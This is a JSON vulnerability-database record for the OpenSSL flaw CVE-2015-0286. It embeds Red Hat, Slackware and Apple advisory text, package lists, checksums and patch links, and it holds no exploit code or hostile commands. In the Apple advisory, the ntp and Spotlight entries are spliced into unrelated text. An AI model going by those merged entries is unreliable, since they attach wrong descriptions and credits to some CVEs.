6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-1.0.1e-30.el6_6.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.7.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.7.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.7.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.7.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.7.src.rpm\n\ni386:\nopenssl-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.7.i686.rpm\n\nppc64:\nopenssl-1.0.1e-30.el6_6.7.ppc.rpm\nopenssl-1.0.1e-30.el6_6.7.ppc64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.7.ppc64.rpm\nopenssl-devel-1.0.1e-30.el6_6.7.ppc.rpm\nopenssl-devel-1.0.1e-30.el6_6.7.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-30.el6_6.7.s390.rpm\nopenssl-1.0.1e-30.el6_6.7.s390x.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.7.s390.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.7.s390x.rpm\nopenssl-devel-1.0.1e-30.el6_6.7.s390.rpm\nopenssl-devel-1.0.1e-30.el6_6.7.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-1.0.1e-30.el6_6.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.7.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-perl-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-static-1.0.1e-30.el6_6.7.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-30.el6_6.7.ppc64.rpm\nopenssl-perl-1.0.1e-30.el6_6.7.ppc64.rpm\nopenssl-static-1.0.1e-30.el6_6.7.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-30.el6_6.7.s390x.rpm\nopenssl-perl-1.0.1e-30.el6_6.7.s390x.rpm\nopenssl-static-1.0.1e-30.el6_6.7.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.7.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.7.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.7.src.rpm\n\ni386:\nopenssl-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.7.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-1.0.1e-30.el6_6.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.7.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-perl-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-static-1.0.1e-30.el6_6.7.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.7.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.7.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-0209\nhttps://access.redhat.com/security/cve/CVE-2015-0286\nhttps://access.redhat.com/security/cve/CVE-2015-0287\nhttps://access.redhat.com/security/cve/CVE-2015-0288\nhttps://access.redhat.com/security/cve/CVE-2015-0289\nhttps://access.redhat.com/security/cve/CVE-2015-0292\nhttps://access.redhat.com/security/cve/CVE-2015-0293\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://www.openssl.org/news/secadv_20150319.txt\nhttps://access.redhat.com/articles/1384453\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFVEJ3JXlSAg2UNWIIRAsnPAJsFc2cGj1Hg8zbtE3wCCEj2hRaLaQCfaVRX\nz2xamw9PEJVbuKTXaQeLRmQ=\n=ZkF+\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1m-i486-1_slack14.1.txz: Upgraded. \n Fixes several bugs and security issues:\n o Segmentation fault in ASN1_TYPE_cmp fix (CVE-2015-0286)\n o ASN.1 structure reuse memory corruption fix (CVE-2015-0287)\n o PKCS7 NULL pointer dereferences fix (CVE-2015-0289)\n o DoS via reachable assert in SSLv2 servers fix (CVE-2015-0293)\n o Use After Free following d2i_ECPrivatekey error fix (CVE-2015-0209)\n o X509_to_X509_REQ NULL pointer deref fix (CVE-2015-0288)\n o Removed the export ciphers from the DEFAULT ciphers\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zf-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zf-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zf-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zf-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zf-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zf-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zf-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zf-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zf-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zf-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zf-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zf-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1m-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1m-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1m-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1m-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1m-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1m-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1m-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1m-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1m-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1m-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1m-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1m-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 packages:\n9ba57b2971962ceb6205ec7b7e6b84e7 openssl-0.9.8zf-i486-1_slack13.0.txz\n706ef57bb71992961584a3d957c5dbcb openssl-solibs-0.9.8zf-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\n5f581b663798eacc8e7df4c292f33dbf openssl-0.9.8zf-x86_64-1_slack13.0.txz\nfe5f33f4d2db08b4f8d724e62bf6e514 openssl-solibs-0.9.8zf-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n1ef0ba15454da786993361c927084438 openssl-0.9.8zf-i486-1_slack13.1.txz\n2b3e20bcaa77f39512b6edcbc41b5471 openssl-solibs-0.9.8zf-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\nf8fae10a1936cf900d362b65d9b2c8df openssl-0.9.8zf-x86_64-1_slack13.1.txz\n0093e35c46382eeef03a51421895ed65 openssl-solibs-0.9.8zf-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n7d4dd0f76252c98622a5f5939f6f0674 openssl-0.9.8zf-i486-1_slack13.37.txz\ne5cde01c0773ac78d33964e4107878df openssl-solibs-0.9.8zf-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n379424e15bd378e00a5ba0c709432429 openssl-0.9.8zf-x86_64-1_slack13.37.txz\n54832ad7e5440ce1c496be47fec9140d openssl-solibs-0.9.8zf-x86_64-1_slack13.37.txz\n\nSlackware 14.0 packages:\n8abafa33d2bf90b6cd8be849c0d9a643 openssl-1.0.1m-i486-1_slack14.0.txz\nbac56213a540586d801d7b57608396de openssl-solibs-1.0.1m-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\nb4c6c971e74b678c68671feed18fa7dc openssl-1.0.1m-x86_64-1_slack14.0.txz\nacac871e22b5de998544c2f6431c0139 openssl-solibs-1.0.1m-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\nc1f47f1f1ba5a13d6ac2ef2ae48bfb4c openssl-1.0.1m-i486-1_slack14.1.txz\nb7b1761ae1585f406d303273812043d3 openssl-solibs-1.0.1m-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\n1c6e11e2e3454836d5a3e9243f7c7738 openssl-1.0.1m-x86_64-1_slack14.1.txz\n25b7a704816a2123463ddbfabbc1b86d openssl-solibs-1.0.1m-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n0926b2429e1326c8ab9bcbbda056dc66 a/openssl-solibs-1.0.1m-i486-1.txz\nb6252d0f141eba7b0a8e8c5bbdc314f0 n/openssl-1.0.1m-i486-1.txz\n\nSlackware x86_64 -current packages:\n99b903f556c7a2d5ec283f04c2f5a650 a/openssl-solibs-1.0.1m-x86_64-1.txz\n9ecb47e0b70bd7f8064c96fb2211c4b7 n/openssl-1.0.1m-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1m-i486-1_slack14.1.txz openssl-solibs-1.0.1m-i486-1_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2015-06-30-2 OS X Yosemite v10.10.4 and Security Update\n2015-005\n\nOS X Yosemite v10.10.4 and Security Update 2015-005 are now available\nand address the following:\n\nAdmin Framework\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A process may gain admin privileges without proper\nauthentication\nDescription: An issue existed when checking XPC entitlements. \nCVE-ID\nCVE-2015-3671 : Emil Kvarnhammar at TrueSec\n\nAdmin Framework\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A non-admin user may obtain admin rights\nDescription: An issue existed in the handling of user\nauthentication. \nCVE-ID\nCVE-2015-3672 : Emil Kvarnhammar at TrueSec\n\nAdmin Framework\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: An attacker may abuse Directory Utility to gain root\nprivileges\nDescription: Directory Utility was able to be moved and modified to\nachieve code execution within an entitled process. \nCVE-ID\nCVE-2015-3674 : Dean Jerkovich of NCC Group\n\napache\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: An attacker may be able to access directories that are\nprotected with HTTP authentication without knowing the correct\ncredentials\nDescription: The default Apache configuration did not include\nmod_hfs_apple. If Apache was manually enabled and the configuration\nwas not changed, some files that should not be accessible might have\nbeen accessible using a specially crafted URL. \nCVE-ID\nCVE-2015-1157\nCVE-2015-3685 : Apple\nCVE-2015-3686 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3687 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3688 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3689 : Apple\n\ncoreTLS\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: An attacker with a privileged network position may intercept\nSSL/TLS connections\nDescription: coreTLS accepted short ephemeral Diffie-Hellman (DH)\nkeys, as used in export-strength ephemeral DH cipher suites. This\nissue, also known as Logjam, allowed an attacker with a privileged\nnetwork position to downgrade security to 512-bit DH if the server\nsupported an export-strength ephemeral DH cipher suite. The issue was\naddressed by increasing the default minimum size allowed for DH\nephemeral keys to 768 bits. \nCVE-ID\nCVE-2015-3692 : Trammell Hudson of Two Sigma Investments, Xeno Kovah\nand Corey Kallenberg of LegbaCore LLC, Pedro Vilaca\n\nEFI\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may induce memory corruption to\nescalate privileges\nDescription: A disturbance error, also known as Rowhammer, exists\nwith some DDR3 RAM that could have led to memory corruption. \nCVE-ID\nCVE-2015-3712 : Ian Beer of Google Project Zero\n\nIntel Graphics Driver\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Multiple buffer overflow issues exist in the Intel graphics\ndriver, the most serious of which may lead to arbitrary code\nexecution with system privileges\nDescription: Multiple buffer overflow issues existed in the Intel\ngraphics driver. \nCVE-ID\nCVE-2015-3695 : Ian Beer of Google Project Zero\nCVE-2015-3696 : Ian Beer of Google Project Zero\nCVE-2015-3697 : Ian Beer of Google Project Zero\nCVE-2015-3698 : Ian Beer of Google Project Zero\nCVE-2015-3699 : Ian Beer of Google Project Zero\nCVE-2015-3700 : Ian Beer of Google Project Zero\nCVE-2015-3701 : Ian Beer of Google Project Zero\nCVE-2015-3702 : KEEN Team\n\nImageIO\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Multiple vulnerabilities existed in libtiff, the most\nserious of which may lead to arbitrary code execution\nDescription: Multiple vulnerabilities existed in libtiff versions\nprior to 4.0.4. \nCVE-ID\nCVE-2015-3709 : Ian Beer of Google Project Zero\n\nMail\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A maliciously crafted email can replace the message content\nwith an arbitrary webpage when the message is viewed\nDescription: An issue existed in the support for HTML email which\nallowed message content to be refreshed with an arbitrary webpage. \nCVE-ID\nCVE-2015-3711 : Peter Rutenbar working with HP\u0027s Zero Day Initiative\n\nntp\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: An attacker in a privileged position may be able to perform\na denial of service attack against two ntp clients\nDescription: Multiple issues existed in the authentication of ntp\npackets being received by configured end-points. Geshev working with HP\u0027s Zero Day Initiative\nCVE-2015-3662 : kdot working with HP\u0027s Zero Day Initiative\nCVE-2015-3663 : kdot working with HP\u0027s Zero Day Initiative\nCVE-2015-3666 : Steven Seeley of Source Incite working with HP\u0027s Zero\nDay Initiative\nCVE-2015-3667 : Ryan Pentney, Richard Johnson of Cisco Talos and Kai\nLu of Fortinet\u0027s FortiGuard Labs, Ryan Pentney, and Richard Johnson\nof Cisco Talos and Kai Lu of Fortinet\u0027s FortiGuard Labs\nCVE-2015-3668 : Kai Lu of Fortinet\u0027s FortiGuard Labs\nCVE-2015-3713 : Apple\n\nSecurity\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A remote attacker may cause an unexpected application\ntermination or arbitrary code execution\nDescription: An integer overflow existed in the Security framework\ncode for parsing S/MIME e-mail and some other signed or encrypted\nobjects. \nCVE-ID\nCVE-2013-1741\n\nSecurity\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Tampered applications may not be prevented from launching\nDescription: Apps using custom resource rules may have been\nsusceptible to tampering that would not have invalidated the\nsignature. \nCVE-ID\nCVE-2015-3715 : Patrick Wardle of Synack\n\nSpotlight\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Searching for a malicious file with Spotlight may lead to\ncommand injection\nDescription: A command injection vulnerability existed in the\nhandling of filenames of photos added to the local photo library. By sending a maliciously\nformatted message to systemstatsd, it may have been possible to\nexecute arbitrary code as the systemstatsd process. \nCVE-ID\n\nCVE-2014-8139\nCVE-2014-8140\nCVE-2014-8141\n\n\nOS X Yosemite 10.10.4 includes the security content of Safari 8.0.7", "sources": [ { "db": "NVD", "id": "CVE-2015-0286" }, { "db": "JVNDB", "id": "JVNDB-2015-001881" }, { "db": "BID", "id": "73225" }, { "db": "VULMON", "id": "CVE-2015-0286" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "131308" }, { "db": "PACKETSTORM", "id": "130933" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "133616" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "130982" }, { "db": "PACKETSTORM", "id": "131086" }, { "db": "PACKETSTORM", "id": "131585" }, { "db": "PACKETSTORM", "id": "132518" } ], "trust": 2.88 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-0286", "trust": 3.2 }, { "db": "BID", "id": "73225", "trust": 1.4 }, { "db": "JUNIPER", "id": "JSA10680", "trust": 1.4 }, { "db": "SECTRACK", "id": "1032917", "trust": 1.1 }, { "db": "SECTRACK", "id": "1031929", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10110", "trust": 1.1 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU99970459", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU97220341", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU95877131", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-001881", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2015-0286", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133318", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131308", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130933", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131044", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133616", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133325", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130982", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131086", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131585", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132518", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-0286" }, { "db": "BID", "id": "73225" }, { "db": "JVNDB", "id": "JVNDB-2015-001881" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "131308" }, { "db": "PACKETSTORM", "id": "130933" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "133616" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "130982" }, { "db": "PACKETSTORM", "id": "131086" }, { "db": "PACKETSTORM", "id": "131585" }, { "db": "PACKETSTORM", "id": "132518" }, { "db": "NVD", "id": "CVE-2015-0286" } ] }, "id": "VAR-201503-0055", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.22222222 }, "last_update_date": "2024-07-23T19:31:48.325000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2015-09-16-1 iOS 9", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2015/sep/msg00001.html" }, { "title": "APPLE-SA-2015-09-30-3 OS X El Capitan 10.11", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2015/sep/msg00008.html" }, { "title": "APPLE-SA-2015-06-30-2 OS X Yosemite v10.10.4 and Security Update 2015-005", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2015/jun/msg00002.html" }, { "title": "HT204942", "trust": 0.8, "url": "http://support.apple.com/en-us/ht204942" }, { "title": "HT205267", "trust": 0.8, "url": "https://support.apple.com/en-us/ht205267" }, { "title": "HT205212", "trust": 0.8, "url": "https://support.apple.com/en-us/ht205212" }, { "title": "HT204942", "trust": 0.8, "url": "http://support.apple.com/ja-jp/ht204942" }, { "title": "HT205212", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht205212" }, { "title": "HT205267", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht205267" }, { "title": "cisco-sa-20150320-openssl", "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150320-openssl" }, { "title": "HPSBGN03306 SSRT102007", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04626468" }, { "title": "\u30a2\u30e9\u30a4\u30c9\u30c6\u30ec\u30b7\u30b9\u682a\u5f0f\u4f1a\u793e\u304b\u3089\u306e\u60c5\u5831", "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu95877131/522154/index.html" }, { "title": "NV15-015", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv15-015.html" }, { "title": "Fix ASN1_TYPE_cmp", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=c3c7fb07dc975dc3c9de0eddb7d8fd79fc9c67c1" }, { "title": "Segmentation fault in ASN1_TYPE_cmp (CVE-2015-0286)", "trust": 0.8, "url": "https://www.openssl.org/news/secadv_20150319.txt" }, { "title": "Oracle Critical Patch Update Advisory - January 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html" }, { "title": "Text Form of Oracle Critical Patch Update - January 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016verbose-2367956.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015verbose-2367947.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "title": "Text Form of Oracle Critical Patch Update - October 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016verbose-2881725.html" }, { "title": "Text Form of Oracle Critical Patch Update - October 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015verbose-2367954.html" }, { "title": "Oracle Solaris Third Party Bulletin - January 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "title": "Bug 1202366", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1202366" }, { "title": "OpenSSL Updates of 19 March 2015", "trust": 0.8, "url": "https://access.redhat.com/articles/1384453" }, { "title": "RHSA-2015:0715", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-0715.html" }, { "title": "RHSA-2015:0716", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-0716.html" }, { "title": "RHSA-2015:0752", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-0752.html" }, { "title": "SA92", "trust": 0.8, "url": "https://bto.bluecoat.com/security-advisory/sa92" }, { "title": "January 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/january_2016_critical_patch_update" }, { "title": "July 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/july_2015_critical_patch_update" }, { "title": "October 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/october_2016_critical_patch_update" }, { "title": "October 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/october_2015_critical_patch_update" }, { "title": "OpenSSL\u306b\u8907\u6570\u306e\u8106\u5f31\u6027 (19 Mar 2015)", "trust": 0.8, "url": "http://www.seil.jp/support/security/a01545.html" }, { "title": "cisco-sa-20150320-openssl", "trust": 0.8, "url": "http://www.cisco.com/cisco/web/support/jp/112/1128/1128874_cisco-sa-20150320-openssl-j.html" }, { "title": "Red Hat: CVE-2015-0286", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-0286" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2537-1" }, { "title": "Amazon Linux AMI: ALAS-2015-498", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-498" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache 